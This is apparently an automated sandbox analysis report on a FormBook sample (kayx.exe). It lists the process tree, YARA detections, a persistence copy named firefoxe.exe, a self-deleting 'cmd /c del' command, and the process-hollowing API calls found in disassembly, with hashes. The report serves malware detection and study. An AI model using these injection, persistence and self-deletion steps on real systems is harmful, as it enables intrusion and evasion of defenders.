Commandline:	C:\Users\user\Desktop\kayx.exe
Imagebase:	0x2c0000
File size:	432640 bytes
MD5 hash:	A80E73A824B655491F54278B7A29467D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: kayx.exe PID: 6900 Parent PID: 6524

General

Start time:	16:32:46
Start date:	20/11/2020
Path:	C:\Users\user\Desktop\kayx.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\kayx.exe
Imagebase:	0x400000
File size:	432640 bytes
MD5 hash:	A80E73A824B655491F54278B7A29467D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3388 Parent PID: 6900

General

Start time:	16:32:49
Start date:	20/11/2020
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff714890000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: firefoxe.exe PID: 3032 Parent PID: 3388

General

Start time:	16:32:52
Start date:	20/11/2020
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe'
Imagebase:	0x9a0000
File size:	432640 bytes
MD5 hash:	A80E73A824B655491F54278B7A29467D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 46%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: firefoxe.exe PID: 2128 Parent PID: 3388

General

Start time:	16:33:00
Start date:	20/11/2020
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe'
Imagebase:	0x3e0000
File size:	432640 bytes
MD5 hash:	A80E73A824B655491F54278B7A29467D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	low

Chronological Activities

Analysis Process: mstsc.exe PID: 6072 Parent PID: 3388

General

Start time:	16:33:05
Start date:	20/11/2020
Path:	C:\Windows\SysWOW64\mstsc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\mstsc.exe
Imagebase:	0x3f0000
File size:	3444224 bytes
MD5 hash:	2412003BE253A515C620CE4890F3D8F3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 4816 Parent PID: 6072

General

Start time:	16:33:08
Start date:	20/11/2020
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\kayx.exe'
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 1632 Parent PID: 4816

General

Start time:	16:33:09
Start date:	20/11/2020
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: kayx.exe PID: 6524 Parent PID: 5776 kayx.exeCOMMON

Executed Functions

Function 05C4C920, Relevance: 1.6, APIs: 1, Instructions: 142COMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32(00000000), ref: 05C4CA6C

Memory Dump Source

Source File: 00000001.00000002.356109220.0000000005C40000.00000040.00000001.sdmp, Offset: 05C40000, based on PE: false

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: e5de52963b1dc0c2815eb8cba308ef0bc5a668433de32deff967abe700b983a3
Instruction ID: 36a2ef6ab7ec1ce65b53bfb4d590e30b5544f44798a2edfd8b566a58b38817a2
Opcode Fuzzy Hash: e5de52963b1dc0c2815eb8cba308ef0bc5a668433de32deff967abe700b983a3
Instruction Fuzzy Hash: 3C511670E042089FDB14CFA9C594BDEBBF1BF48304F248429D816AB3A1DB749949CF91

Uniqueness

Uniqueness Score: -1.00%

Function 05C4AAE8, Relevance: 1.6, APIs: 1, Instructions: 55nativeCOMMON

Download Yara Rule

APIs

NtUnmapViewOfSection.NTDLL(?,?), ref: 05C4AB55

Memory Dump Source

Source File: 00000001.00000002.356109220.0000000005C40000.00000040.00000001.sdmp, Offset: 05C40000, based on PE: false

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: f10f5dffed64b3c4e2e7e0cf56fdf47d8e27ed82aab8ddce8b51e4b1c3c3ead3
Instruction ID: 91e6972f49a447de869d358ac7bd30171a000f77a9f2e0f9a1fd5d94664e7d9e
Opcode Fuzzy Hash: f10f5dffed64b3c4e2e7e0cf56fdf47d8e27ed82aab8ddce8b51e4b1c3c3ead3
Instruction Fuzzy Hash: 76112971D002098BCB10DFA9D845BEEBBF5AF58324F14881AD919A7740DB75A949CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 05C4AAF0, Relevance: 1.6, APIs: 1, Instructions: 52nativeCOMMON

Download Yara Rule

APIs

NtUnmapViewOfSection.NTDLL(?,?), ref: 05C4AB55

Memory Dump Source

Source File: 00000001.00000002.356109220.0000000005C40000.00000040.00000001.sdmp, Offset: 05C40000, based on PE: false

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: ff00f7e84325c4201f412e593d4dff5240759ecc94f14269331476cf9c78b1c6
Instruction ID: 29d6adc27e7c8247a0a1769bdf97070e62c9c970e9c9c1ada25e83d0680d10e3
Opcode Fuzzy Hash: ff00f7e84325c4201f412e593d4dff5240759ecc94f14269331476cf9c78b1c6
Instruction Fuzzy Hash: B7114971D002098FCB10DFAAC844BEEFBF5AF88324F148819D529A7740CB75A945CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 05C42938, Relevance: .7, Instructions: 670COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.356109220.0000000005C40000.00000040.00000001.sdmp, Offset: 05C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e508ac2cd20817fca29e147d86578d731a739b9acfed2f161bc28261ee34a08
Instruction ID: 7916a01e4420b30286bc03ab61790bacf086d5f01718aeea4a5585d6a97ceb7b
Opcode Fuzzy Hash: 0e508ac2cd20817fca29e147d86578d731a739b9acfed2f161bc28261ee34a08
Instruction Fuzzy Hash: 62522835A00514DFDB15CFA9C984EA9BBB2FF88314F1685A8E5099B272CB31EC95DF40

Uniqueness

Uniqueness Score: -1.00%

Function 01850C1C, Relevance: .4, Instructions: 367COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a2ead46bbc91d5215f822eff82253ec85ae02a2728d4dbd0ffd7cee7beeaeed
Instruction ID: 8dbc6979515716c920a3053745648c86ce8028c612cd66848878aa93267163e4
Opcode Fuzzy Hash: 0a2ead46bbc91d5215f822eff82253ec85ae02a2728d4dbd0ffd7cee7beeaeed
Instruction Fuzzy Hash: 83E16C30A002199FDB40DBA9C944BAEB7F6FF88304F258169E905DB795DB74ED46CB80

Uniqueness

Uniqueness Score: -1.00%

Function 05C4AC45, Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05C4AE86

Memory Dump Source

Source File: 00000001.00000002.356109220.0000000005C40000.00000040.00000001.sdmp, Offset: 05C40000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: da10f3d5ba383fca11dfcfce2efe6edc911f05779d5937bb95c20fa30db2aff4
Instruction ID: cf1e25dd2724ca6b77c02533b6ce7fa134227e4a18ec014c8d2b9ea486250d40
Opcode Fuzzy Hash: da10f3d5ba383fca11dfcfce2efe6edc911f05779d5937bb95c20fa30db2aff4
Instruction Fuzzy Hash: A9A14B71D00219DFDB14CFA8CC85BEDBBB2BF48314F148969E819A7240DB749A85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 05C4AC50, Relevance: 1.7, APIs: 1, Instructions: 245processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05C4AE86

Memory Dump Source

Source File: 00000001.00000002.356109220.0000000005C40000.00000040.00000001.sdmp, Offset: 05C40000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 947e7b4d793f85a12eef232ecb49e8e01d5712f56a1e89219023295b268ce5bd
Instruction ID: b011aa7dc563333ab158873094b716cf13baa1ed817647c8d9cdabf1f71b6923
Opcode Fuzzy Hash: 947e7b4d793f85a12eef232ecb49e8e01d5712f56a1e89219023295b268ce5bd
Instruction Fuzzy Hash: D3A14B71D002199FDB14CFA9CC84BEDBBB2BF48314F148969D819A7240DB749A85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 05C4C914, Relevance: 1.6, APIs: 1, Instructions: 142COMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32(00000000), ref: 05C4CA6C

Memory Dump Source

Source File: 00000001.00000002.356109220.0000000005C40000.00000040.00000001.sdmp, Offset: 05C40000, based on PE: false

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 94f4b16351656ca4baf0eb73a8d14ee45f890e49476dece683d8ab3374fd56e6
Instruction ID: 59809b85adb56c7a71b2c35f93d4f1a3d4b3c2a5f126e109800a19e578206e01
Opcode Fuzzy Hash: 94f4b16351656ca4baf0eb73a8d14ee45f890e49476dece683d8ab3374fd56e6
Instruction Fuzzy Hash: B6512470D042189FDB14CFA9C985BEEBBF1BF48304F248529D816AB3A1DB749949CF91

Uniqueness

Uniqueness Score: -1.00%

Function 05C422E0, Relevance: 1.6, APIs: 1, Instructions: 72fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNELBASE(?,00000000,?), ref: 05C42379

Memory Dump Source

Source File: 00000001.00000002.356109220.0000000005C40000.00000040.00000001.sdmp, Offset: 05C40000, based on PE: false

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: bfa322dd0f0e30e6f59883e77d1e5ed19e8216daf3b23ecc48312a0fa3612357
Instruction ID: 0cd1b175eb528be59ea4f2a0df9d1b3a265ab08ffca15174030dc7d5520bc440
Opcode Fuzzy Hash: bfa322dd0f0e30e6f59883e77d1e5ed19e8216daf3b23ecc48312a0fa3612357
Instruction Fuzzy Hash: B02127B5D012199FCB50CF9AD485BEEFBF5BF48320F14846AE818AB241D7349A45CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 05C4A918, Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05C4A9B0

Memory Dump Source

Source File: 00000001.00000002.356109220.0000000005C40000.00000040.00000001.sdmp, Offset: 05C40000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 4d507a8bb358246678d94099024970f8038151885e0c1a4d6d2e0614638d1f4b
Instruction ID: 97d007938dfbc26ad2cd2ff388b332f8a1a3236e44f13e6d73ecdc00225aadb1
Opcode Fuzzy Hash: 4d507a8bb358246678d94099024970f8038151885e0c1a4d6d2e0614638d1f4b
Instruction Fuzzy Hash: 4E2126B5D002499FCF10CFA9C981BEEBBF5BF48314F10882AE959A7240D7749A55CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 05C4A920, Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05C4A9B0

Memory Dump Source

Source File: 00000001.00000002.356109220.0000000005C40000.00000040.00000001.sdmp, Offset: 05C40000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: b049c58bc1fc2496d668ae81306ed57530d59d59202c2886d6297d63b5619860
Instruction ID: 1dd6fe3b17b1d78655394b77db38f4179deea602a340228da11debd7f935673b
Opcode Fuzzy Hash: b049c58bc1fc2496d668ae81306ed57530d59d59202c2886d6297d63b5619860
Instruction Fuzzy Hash: 6B2106719002499FCF10DFA9C884BEEBBF5FF48314F108429E959A7240D774AA55CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 05C422D9, Relevance: 1.6, APIs: 1, Instructions: 71fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNELBASE(?,00000000,?), ref: 05C42379

Memory Dump Source

Source File: 00000001.00000002.356109220.0000000005C40000.00000040.00000001.sdmp, Offset: 05C40000, based on PE: false

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: de68d74d50546647d924a1f2590d3f33d14464f74cb355246fdcd14aa08543fe
Instruction ID: 8ea948fccbecaba9fe812629e682ee9c87ce7192150bb46d78e66f2c57fbfac9
Opcode Fuzzy Hash: de68d74d50546647d924a1f2590d3f33d14464f74cb355246fdcd14aa08543fe
Instruction Fuzzy Hash: FB3127B5D012198FCB40CFA9D581BEEBBF5BF48320F14846AE818EB240D7349A45CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 05C4A770, Relevance: 1.6, APIs: 1, Instructions: 68threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE(?,00000000), ref: 05C4A7F6

Memory Dump Source

Source File: 00000001.00000002.356109220.0000000005C40000.00000040.00000001.sdmp, Offset: 05C40000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 55e5f4d9d9951261df333788cb40a7f58f03eb91127acbf8e2aabdab81b50551
Instruction ID: 59098fd2f012babf17fe3e8d7b67b205080abe83ad42e71dfad922b9ac679e87
Opcode Fuzzy Hash: 55e5f4d9d9951261df333788cb40a7f58f03eb91127acbf8e2aabdab81b50551
Instruction Fuzzy Hash: DA213671D002098FCB10CFAAC8847EEBBF5EF48314F148429D919A7740DB78AA49CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 05C4AA09, Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05C4AA90

Memory Dump Source

Source File: 00000001.00000002.356109220.0000000005C40000.00000040.00000001.sdmp, Offset: 05C40000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 1db27c2c5af1658d9596ec0ef3dc3cbae6ba4d594321d2e05893814056b238f2
Instruction ID: 41764a30b9d62328b658975c36a8a1fa8bcf113c3a96372928273c63b4bf1557
Opcode Fuzzy Hash: 1db27c2c5af1658d9596ec0ef3dc3cbae6ba4d594321d2e05893814056b238f2
Instruction Fuzzy Hash: CD2115B19002499FCF10DFA9C984BEEBBF5FF48314F108829E919A7240D734A905CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 05C4A778, Relevance: 1.6, APIs: 1, Instructions: 65threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE(?,00000000), ref: 05C4A7F6

Memory Dump Source

Source File: 00000001.00000002.356109220.0000000005C40000.00000040.00000001.sdmp, Offset: 05C40000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 5cd2d282e9509fc9144c5d79498430cb181a5b9b676cae1ae8d5c64fbe8b38c0
Instruction ID: 5b51bcef0cac695ab77207d5c8a32ab658351d626571b857fb8d177acf0bb236
Opcode Fuzzy Hash: 5cd2d282e9509fc9144c5d79498430cb181a5b9b676cae1ae8d5c64fbe8b38c0
Instruction Fuzzy Hash: 1E213971D002098FCB10DFAAC8847EEBBF5FF48314F148429D959A7640DB78AA45CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 05C4AA10, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05C4AA90

Memory Dump Source

Source File: 00000001.00000002.356109220.0000000005C40000.00000040.00000001.sdmp, Offset: 05C40000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 354cb045b6b344663a3609e57659a06e9a457449c2360034e6f4c532f2e20201
Instruction ID: a2c5971d66c5b863c697cf37f510e365810f1143ca5a579ca928e82863034dec
Opcode Fuzzy Hash: 354cb045b6b344663a3609e57659a06e9a457449c2360034e6f4c532f2e20201
Instruction Fuzzy Hash: F721F6B1D002499FCF10DFA9C980AEEBBF5FF48314F108829E919A7240D7359955CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 05C4A850, Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05C4A8C6

Memory Dump Source

Source File: 00000001.00000002.356109220.0000000005C40000.00000040.00000001.sdmp, Offset: 05C40000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b051da72136079d9ce682f3be52068a8911384ecce57fe6c3502be53777e7ddc
Instruction ID: da03155ee5890eb443a428308bae92c7d025f141647a3da52f7d593132d5e52a
Opcode Fuzzy Hash: b051da72136079d9ce682f3be52068a8911384ecce57fe6c3502be53777e7ddc
Instruction Fuzzy Hash: AC213671D002099BCF10DFA9D844BEFBBF9EF48314F148819E925A7240CB35A959CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 05C4A858, Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05C4A8C6

Memory Dump Source

Source File: 00000001.00000002.356109220.0000000005C40000.00000040.00000001.sdmp, Offset: 05C40000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c94a0c1190678d2a282e323c64a7159ac68202df2c6c8d675ab584956b193d6a
Instruction ID: 7bc8e541b7b675da032bc39358166a8e39c05cdc7e9655d4b2d639a41f844ed7
Opcode Fuzzy Hash: c94a0c1190678d2a282e323c64a7159ac68202df2c6c8d675ab584956b193d6a
Instruction Fuzzy Hash: BE113671D002099BCF10DFA9D844BEEBBF5EF48314F108819D925A7240CB35A955CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 05C4A6B9, Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 05C4A722

Memory Dump Source

Source File: 00000001.00000002.356109220.0000000005C40000.00000040.00000001.sdmp, Offset: 05C40000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 96d61d3cf729a23832b20871a86c67db38c02f5be0102f672f21b87b0aad7805
Instruction ID: 6ea7746653321d65d64fa00b084c2027b3eaf34361512240a07345a43279c20e
Opcode Fuzzy Hash: 96d61d3cf729a23832b20871a86c67db38c02f5be0102f672f21b87b0aad7805
Instruction Fuzzy Hash: F8113771D002498BCB20DFAAC8447EFBBF9AB88214F148819D529A7340CB35A949CF90

Uniqueness

Uniqueness Score: -1.00%

Function 05C4A6C0, Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 05C4A722

Memory Dump Source

Source File: 00000001.00000002.356109220.0000000005C40000.00000040.00000001.sdmp, Offset: 05C40000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 654c51296abbc5716607433133ef57ec1733e1fccc58a521d764ead0e2e78c78
Instruction ID: b6ead4b21870983676d43b9a495c0a78cb563b41db60e1ee0b8ed9ce937067b5
Opcode Fuzzy Hash: 654c51296abbc5716607433133ef57ec1733e1fccc58a521d764ead0e2e78c78
Instruction Fuzzy Hash: D0111971D002498BCB20DFAAD8447EFFBF5AF88314F148819D529A7740DB75A945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 01851552, Relevance: 1.4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

Strings

8v, xrefs: 018515FD

Memory Dump Source

Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false

Similarity

API ID:
String ID: 8v
API String ID: 0-1830031809
Opcode ID: e2c34e68aa7ab1e9a95ece821542763916ed87672f42eb20f228bbb8e8e48f34
Instruction ID: d1b3ad5b7e248ea74f1015c301e29ad94eac0fdbd67689ac6cd36e5654347824
Opcode Fuzzy Hash: e2c34e68aa7ab1e9a95ece821542763916ed87672f42eb20f228bbb8e8e48f34
Instruction Fuzzy Hash: 4A41AD31A006058BCB50DFA4D4482AEF7F2FF88314B108A6DD60AAB754EF75A9458B91

Uniqueness

Uniqueness Score: -1.00%

Function 018521F8, Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea2ca842d9cd5344a29041ad5f090af5c92c6ef85b2832ef70dc5d70ff35e7c5
Instruction ID: f184c693c51e5d1f75673a2fbe355c226907c892f0127abc0f1c9427d31ccf43
Opcode Fuzzy Hash: ea2ca842d9cd5344a29041ad5f090af5c92c6ef85b2832ef70dc5d70ff35e7c5
Instruction Fuzzy Hash: 27615E70204B41CFD764DF29C48462ABBF3EF98314B548A6DC89AC7B66DB70F9468B41

Uniqueness

Uniqueness Score: -1.00%

Function 018519E0, Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 408c81373b08508951c11fe295012410eb60b36a57b3e31c5eb37143c4de9f1f
Instruction ID: 1129e2fccd818d3b0b21586f3384b54121df942f4ed0ab0313310368244c0fdf
Opcode Fuzzy Hash: 408c81373b08508951c11fe295012410eb60b36a57b3e31c5eb37143c4de9f1f
Instruction Fuzzy Hash: 5F51D535208759CFC797CF58D888A6AB7F5FB41359701896AD857CBA00E730AB48C792

Uniqueness

Uniqueness Score: -1.00%

Function 01853BD8, Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fee8287625b4a7cdf18773fa2fbd1aecd44494cfc29084d4f52b329ff3cb6349
Instruction ID: e598af418a6096a1cf86561cce24b214610d78ac65e459b195ef3263be86efec
Opcode Fuzzy Hash: fee8287625b4a7cdf18773fa2fbd1aecd44494cfc29084d4f52b329ff3cb6349
Instruction Fuzzy Hash: DB51163074824CEFC780876AC854B6ABBB5FB85798F1540A6ED02DF392C671EF018792

Uniqueness

Uniqueness Score: -1.00%

Function 0185481F, Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d213e3b5806e12e5cb282c04c69a6cb247b66d8b9e6a881575d3c9651c69fc4
Instruction ID: 3b66a3930572b190d49f3550b991c34df93439c9291ec5036ecb2e5106fd6c2b
Opcode Fuzzy Hash: 8d213e3b5806e12e5cb282c04c69a6cb247b66d8b9e6a881575d3c9651c69fc4
Instruction Fuzzy Hash: B741D038B04244CFC7949B75E46466A33F2EB8631CB2148B9D902CB761EB36CDC6CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01856F73, Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff8a4e2f86ebc6fd6ced6c93c3c978af74330ebe3f963a5efd057577686fac3a
Instruction ID: 66dc9bb81b7a6b565ccc7c509ce7922086a69bb5bfa156223146365d45094084
Opcode Fuzzy Hash: ff8a4e2f86ebc6fd6ced6c93c3c978af74330ebe3f963a5efd057577686fac3a
Instruction Fuzzy Hash: 53316D74908288CFDB91CB99C185BDC7FB0EB05328FE55295DC56DF296E3349A8ACB01

Uniqueness

Uniqueness Score: -1.00%

Function 018566CF, Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddde1fd04cfafe81461cdb1cf7ab27dac41263190f7e5cde236580b13c1b1f1a
Instruction ID: bcd19f7b73b8fbaa489f73cd5ea27c1831b32fc76ebf323b044080c55d32bc7a
Opcode Fuzzy Hash: ddde1fd04cfafe81461cdb1cf7ab27dac41263190f7e5cde236580b13c1b1f1a
Instruction Fuzzy Hash: D23133343041108FD7A4DB29D558B2ABBE2EF89718F6601A9E506CF3B1EA71ED44CB52

Uniqueness

Uniqueness Score: -1.00%

Function 01854630, Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7c4028f76f5440f76774c33eddd4d633292f9457bdf410daa81146bcaedee9e
Instruction ID: d0684ec6ac1fbf17dd7881e72b63703002c839c77806dee21ff9a1872e0a5017
Opcode Fuzzy Hash: a7c4028f76f5440f76774c33eddd4d633292f9457bdf410daa81146bcaedee9e
Instruction Fuzzy Hash: E1318D34618248CFFBF64BA9E00C3653BA4EB0131DF18456AEA07C6495F7798AC4CB63

Uniqueness

Uniqueness Score: -1.00%

Function 01851C6C, Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
